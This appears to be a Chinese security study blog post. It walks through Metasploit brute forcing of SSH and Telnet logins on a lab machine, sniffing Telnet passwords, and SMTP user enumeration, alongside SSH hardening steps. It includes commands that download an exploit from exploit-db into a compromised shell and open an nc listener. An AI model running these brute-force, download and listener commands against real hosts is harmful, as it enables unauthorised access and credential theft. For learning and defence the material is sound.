<p>Metasploit利用ssh登录反弹Shell<br>使用Metasploit可以进行ssh登录破解，会自动建立对应的Bash shell连接<br><img src="https://img-blog.csdnimg.cn/20200528173546383.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>输入msfconsole回车等待一会儿<br><img src="https://img-blog.csdnimg.cn/20200528173556123.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br><img src="https://img-blog.csdnimg.cn/20200528173602570.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br><img src="https://img-blog.csdnimg.cn/20200528173609158.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>可以进行在命令行的一些操作。<br><img src="https://img-blog.csdnimg.cn/2020052817362028.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>输入exit退出服务。<br>ssh安全防御<br>1、ssh修改默认端口<br>默认情况下，ssh使用22端口，为了安全，一般情况下都会修改默认端口。<br>修改ssh配置文件，讲port改为其他的端口。<br>cd /etc/ssh/<br>ls<br>sudo gedit sshd_config</p>
<p>修改后记得重启ssh服务。<br>ssh设置PGP登录<br>默认情况下，ssh使用用户名和密码进行远程登录，但也可以使用密钥对进行身份验证登录（公钥与私钥）<br>生成ssh密钥对，使用puttygen<br>下载链接： <a target="_blank" rel="noopener" href="https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html">点击下载</a></p>
<p>使用 ssh-keygen命令在linux生成.ssh目录，在.ssh下新建密钥存储文件authorized_keys，并复制私钥文件到.ssh目录录下。使用命令puttygen -L “拷贝私钥文件”，并将内容拷贝到authorized_keys文件中。<br>看着有点懵，需要的话，跟着视频操作一下。</p>
<p>ssh防御暴力破解用户账号<br>设置ssh配置文件中ctrl+f找到password</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#change to no to  disable tunnelled clear text passwords</span></span><br><span class="line"><span class="comment"># PasswordAuthentication yes</span></span><br></pre></td></tr></table></figure>

<p>将第二句的注释符去掉，并将yes改为no<br>重启服务。<br>问题是：不能使用用户名密码进行登录，进行操作的话很复杂。<br>虽然能防止暴力破解，缺点也比较明显</p>
<p>IPtables设置阀(fa)值防止暴力破解<br>使用iptables对多次连接验证错误，进行帐户锁定120秒</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo iptables <span class="literal">-I</span> INPUT <span class="literal">-p</span> tcp -<span class="literal">-dport</span> <span class="number">22</span> <span class="literal">-i</span> eth0 <span class="literal">-m</span> state -<span class="literal">-state</span> NEW <span class="literal">-m</span> recent -<span class="literal">-set</span></span><br><span class="line">sudo iptables <span class="literal">-i</span> INPUT <span class="literal">-p</span> tcp -<span class="literal">-dport</span> <span class="number">22</span> <span class="literal">-i</span> eth0 <span class="literal">-m</span> state -<span class="literal">-state</span> NEW <span class="literal">-m</span> recent -<span class="literal">-update</span> -<span class="literal">-seconds</span> <span class="number">120</span> -<span class="literal">-hitcount</span> <span class="number">3</span> <span class="literal">-j</span> DROP</span><br></pre></td></tr></table></figure>
<p>设置完成后，重新启动ssh服务。<br>还是这个办法不错点。</p>
<h2 id="Telnet服务漏洞利用"><a href="#Telnet服务漏洞利用" class="headerlink" title="Telnet服务漏洞利用"></a>Telnet服务漏洞利用</h2><p>telnet介绍<br>Telnet协议是TCP/IP协议家族中的一员，是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序，用它连接到服务器。终端使用者可以在telnet程序中输入命令，这些命令会在服务器上运行，就像直接在服务器的控制台上输入一样<br>默认端口使用23端口。<br>可以使用nmap。。。尽量多使用nmap<br>检测是否开启telnet服务<br>获取telnet版本信息<br>    1. 使用nmap：   </p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap <span class="literal">-p</span> <span class="number">23</span> <span class="literal">-sV</span> <span class="number">192.168</span>.<span class="number">1.105</span></span><br></pre></td></tr></table></figure>

<p>然后可以看到23端口的telnet服务是否开启。并获取版本信息<br>2. 使用metasploit<br>msfconsole<br>打开后，输入search telnet<br>发现telnet的可使用的模块信息<br>查询，如果很慢的话，使用</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/telnet/telnet_version</span><br><span class="line">show options</span><br><span class="line"><span class="built_in">set</span> rhosts <span class="number">192.168</span>.<span class="number">1.105</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p>可以看到telnet的信息</p>
<h3 id="telnet密码破解"><a href="#telnet密码破解" class="headerlink" title="telnet密码破解"></a>telnet密码破解</h3><p>使用metasploit下，针对telnet破解的模块进行用户名和密码的破解<br>在msfconsole下使用search telnet进行查询telnet可以利用的模块<br>使用模块login的那个<br><code>use auxiliary/scanner/telnet/telnet_login</code><br>先设置rhosts<br><code>set rhosts 192.168.1.105</code><br>设置用户名<br><code>set username [用户名]</code><br>设置密码<br><code>set pass_file [字典路径]</code><br>设置线程（高一点，设为10）</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> threads <span class="number">10</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>就开始爆破密码了。<br>能够得出密码</p>
<p>telnet登录<br>还在login模块<br>输入<code>sessions -l</code><br>开始一个会话，<br><code>sessions -i 1</code><br>进入会话，可以使用命令行也就是终端</p>
<p>telnet客户端连接服务器端<br>windows下是默认不开启telnet服务的，需要手动开启</p>
<p>打开控制面板（ctrl+R）输入control<br>点击程序—&gt;点击程序与功能中的启用或关闭windows功能</p>
<p>找到Telnet Client，打对勾</p>
<p>打开cmd，输入telnet<br>打开服务，在输入    ?<br> 查看帮助信息<br><code>o [ip]</code><br>输入用户名和密码即可登录</p>
<p>telnet明文密码传输<br>使用wireshark来抓取telnet数据包<br>选择WLAN，然后输入telnet筛选信息。<br>在cmd中进行连接telnet的操作。然后就能看到抓到了数据包。<br>用户名和密码输入后，停止抓包。<br>追踪TCP数据流，就可以看到用户名和密码了。</p>
<p>telnet登录后提权<br>msf登录telnet<br>在metasploit中使用 telnet_login进行登录，并使用<code>sessions -i id </code>连接shell<br>步骤：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">use auxiliary/scanner/telnet_login</span><br><span class="line">show opyions    查看需要设置的信息</span><br></pre></td></tr></table></figure>

<p>设置相应的IP和用户名还有密码，进行登陆</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">run</span><br><span class="line">sessions <span class="literal">-l</span></span><br><span class="line">sessions <span class="literal">-i</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>获得了一个shell</p>
<p>msf连接shell下载exp<br>使用wget进行下载</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">wget</span> http://www.exploit<span class="literal">-db</span>.com/download/<span class="number">8572</span></span><br></pre></td></tr></table></figure>

<p>设置 kali  nc 监听<br><code>nc -lvp 4444</code><br>开始监听4444端口<br>再看一遍视频。</p>
<h2 id="smtp服务漏洞"><a href="#smtp服务漏洞" class="headerlink" title="smtp服务漏洞"></a>smtp服务漏洞</h2><p>Smtp实验环境搭建<br>邮件发送与接受模型<br>邮件发送使用Smtp协议，占用25号端口。而邮件接收使用pop3或imap协议，分别占用110和143端口。<img src="https://img-blog.csdnimg.cn/20200528174254534.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>添加主机名和域名（Ubuntu下）<br>为了在本地搭建好邮件服务器，所以需要修改对应内容。使得可以在本地进行域名解析。</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sudo gedit /etc/hosts</span><br><span class="line"><span class="number">127.0</span>.<span class="number">0.1</span> mail.test.lab test</span><br><span class="line"></span><br><span class="line">sudo gedit /etc/hostname</span><br><span class="line">test</span><br></pre></td></tr></table></figure>

<p>修改完成之后使用reboot进行重启，使得修改生效。<br>修改完成后可以使用hostname或hostname -f 查看修改是否成功。<br><img src="https://img-blog.csdnimg.cn/20200528174322400.png" alt="j4y" loading="lazy"><br>Ubuntu安装postfix<br>因为postfix是非常流行的smtp软件，所以ubuntu的主要库中集成了postfix，可以直接使用以下命令安装<br><code>sudo apt-get install postfix</code><br>安装完成后修改配置文件<br><code>sudo gedit /etc/postfix/main.cf</code></p>
<p>追加子网信息</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">inet_protocols = ipv4</span><br><span class="line">home_mailbox = Maildir/</span><br></pre></td></tr></table></figure>

<p>修改完成后重新启动服务 postfix<br><code>sudo service postfix restart </code><br>然后使用 netstat -nlv 来查看对应的25端口是否开启。<br><img src="https://img-blog.csdnimg.cn/20200528174359487.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>ubuntu安装dovecot</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt<span class="literal">-get</span> install dovecot<span class="literal">-imapd</span> dovecot<span class="literal">-pop3d</span></span><br></pre></td></tr></table></figure>

<p>安装完成之后进行配置</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sudo gedit /etc/dovecot/conf.d/<span class="number">10</span><span class="literal">-auth</span>.conf</span><br><span class="line">disable_plaintest_auth = yes</span><br><span class="line">auth_mechanisms = plain login</span><br><span class="line">sudo gedit /etc/dovecot/conf.d/<span class="number">10</span><span class="literal">-mail</span>.conf</span><br><span class="line">mail_location = maildir:/home/%u/Maildir</span><br></pre></td></tr></table></figure>

<p>下面哪行没有注释的，将它改成<code>maildir:/home/%u/Maildir</code><br><code>sudo gedit /etc/dovecot/conf.d/10-master.conf</code><br>设置 port = 143 port 110<br>将这两个端口前面的井号去掉就行。修改完成后使用命令netstat -pantu查看相关配置是否开启修改权限（在10-master.conf文件中）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">unix_listerner auth-usrdb&#123;            </span><br><span class="line">		mode = 0600            </span><br><span class="line">		user = postfix            </span><br><span class="line">		group = postfix</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>重新启动dovecot服务</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo service dovecot restart  </span><br></pre></td></tr></table></figure>
<p> 使用netstat -nlv 查看服务端口<br>OK完成。</p>
<p>枚举smtp用户名<br>telnet测试用户名<br>telnet [ip] [port]     //一般是25号端口</p>
<p>然后输入    vrfy 电子邮箱地址。<br>    <code>vrfy test@mail.test.lab </code><br>如果存在该用户， 则返回252信息<br>如果不存在则返回550信息。<br>自动化工具测试<br>metasploit测试用户名<br>在meatsploit中有 smtp-enum可以对smtp上的用户名进行枚举。<br>打开metasploit先输入msfconfig</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/smtp/smtp_enum</span><br><span class="line"><span class="built_in">set</span> rhosts 192.168.1.101</span><br><span class="line"><span class="built_in">set</span> rport 25</span><br><span class="line"><span class="built_in">set</span> threads  //可以加快进行速度。</span><br><span class="line"><span class="built_in">set</span> user_file /root/Desktop/user.txt</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>下一款工具smtp-user-enum<br>用来专门进行smtp用户名枚举工具<br>用法：：    </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smtp-user-enum -M VRFY-U /root/Desktop/user.txt -t 192.168.1.106</span><br></pre></td></tr></table></figure>

<p>再来一款：<br>ismtp测试用户名：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ismtp -h [ip]:25 -e /root/desktop/email.txt</span><br></pre></td></tr></table></figure>

</div><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hand-coin-line"></use></svg></span><div id="reward-comment">I'm so cute. Please give me a candy.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://images.cnblogs.com/cnblogs_com/Augenstern-blog/1822695/o_200806164747m0re2020-08-07_00-47-30.jpg"><img loading="lazy" src="https://images.cnblogs.com/cnblogs_com/Augenstern-blog/1822695/o_200806164747m0re2020-08-07_00-47-30.jpg" alt="支付宝" title="支付宝"></a><div><span style="color:#00A3EE"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-alipay-line"></use></svg></span></div></div><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://images.cnblogs.com/cnblogs_com/Augenstern-blog/1822695/o_200806164656mm_reward_qrcode_1596729168536.png"><img loading="lazy" src="https://images.cnblogs.com/cnblogs_com/Augenstern-blog/1822695/o_200806164656mm_reward_qrcode_1596729168536.png" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-wechat-pay-line"></use></svg></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>m0re</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://zxcv0221.github.io/2020/07/30/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F/" title="漏洞扫描">https://zxcv0221.github.io/2020/07/30/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2020/08/23/hello-world/" rel="prev" title="Hello World"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">Hello World</span></a></div><div class="post-nav-item"></div></div></div><div id="comment"><div class="comment-tooltip text-center"><span>尝试使用 utterances （基于 GitHub Issues）评论系统。</span><br><span>您可以点击下方按钮切换对应评论系统，</span><br><span><script>function showUtterances(){ document.querySelector(".utterances").style.display='block'; document.querySelector('#valine-container').style.display='none'; }function showValine(){ document.querySelector('#valine-container').style.display='block'; document.querySelector(".utterances").style.display='none'; }</script></span><br><span><a class="hty-button hty-button--raised" onclick="showValine()">Valine</a><a class="hty-button hty-button--raised" onclick="showUtterances()">utterances</a></span><br><span><style>.utterances{display:none;}</style></span><br></div><div id="valine-container"></div><script src="https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script><script>function initValine() {
  const valineConfig = {"enable":true,"appId":"gUEA9zKLhCnMFxQI5kI20WiD-gzGzoHsz","appKey":"GQKAp04LNloy3MrDMv86MI3i","placeholder":"评论一下~&nbsp_(:з」∠)_ （填写邮箱可以收到回复通知～）","avatar":null,"pageSize":10,"visitor":true,"highlight":true,"recordIP":true,"enableQQ":true,"requiredFields":["nick","mail"],"el":"#valine-container","lang":"zh-cn"}
  valineConfig.path = window.location.pathname
  new Valine(valineConfig)
}
setTimeout(initValine, 1000)</script></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2020 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> m0re</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.1.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v0.9.7</span></div><div class="live_time"><span>本博客已苟延残喘了</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  window.setTimeout(blog_live_time, 1000);
  const start = new Date('2020-02-21T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div></footer><a class="hty-icon-button" id="goUp" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="这里可以搜索本站内容~" value=""></div><div id="local-search-result"></div></div><script>let date = new Date();
let today = (date.getMonth() + 1) + "-" + date.getDate()
if ("4-4,9-18".indexOf(today) !== -1) {
  document.documentElement.style.filter = "grayscale(1)";
}</script></div><script defer src="/js/utils.js"></script><script defer src="/js/hexo-theme-yun.js"></script></body></html>